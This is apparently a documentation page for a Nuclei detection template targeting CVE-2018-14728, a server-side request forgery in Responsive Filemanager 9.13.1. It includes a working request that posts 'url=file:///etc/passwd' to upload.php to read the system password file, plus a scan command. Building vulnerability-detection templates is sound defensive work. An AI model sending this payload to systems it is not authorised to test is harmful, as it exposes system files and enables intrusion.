Skip to content
Nuclei Templates

Responsive filemanager 9.13.1 Server-Side Request Forgery

ID: CVE-2018-14728

Severity: critical

Author: madrobot

Tags: cve2018,cve,ssrf,lfi,packetstorm,edb,intrusive,tecrail

Description

Section titled “Description”

Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2018-14728


info:
  name: Responsive filemanager 9.13.1 Server-Side Request Forgery
  author: madrobot
  severity: critical
  description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter.
  impact: |
    An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.
  remediation: |
    Upgrade to a patched version of Responsive Filemanager or apply the necessary security patches to mitigate the SSRF vulnerability.
  reference:
    - http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html
    - https://www.exploit-db.com/exploits/45103/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-14728
    - https://github.com/sobinge/nuclei-templates
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-14728
    cwe-id: CWE-918
    epss-score: 0.96369
    epss-percentile: 0.99525
    cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: tecrail
    product: responsive_filemanager
  tags: cve2018,cve,ssrf,lfi,packetstorm,edb,intrusive,tecrail


http:
  - method: POST
    path:
      - "{{BaseURL}}/filemanager/upload.php"


    body: fldr=&url=file:///etc/passwd
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 490a004630440220563032eda568bf17708cf54a6ab7dc6ba20add7bf35ccc53784b936053caf10d02205b65d5dd8f1f8071a5b1e31b3bbd428d653f2ed7867da9e941d15b9bf744e690:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-14728.yaml"

View on Github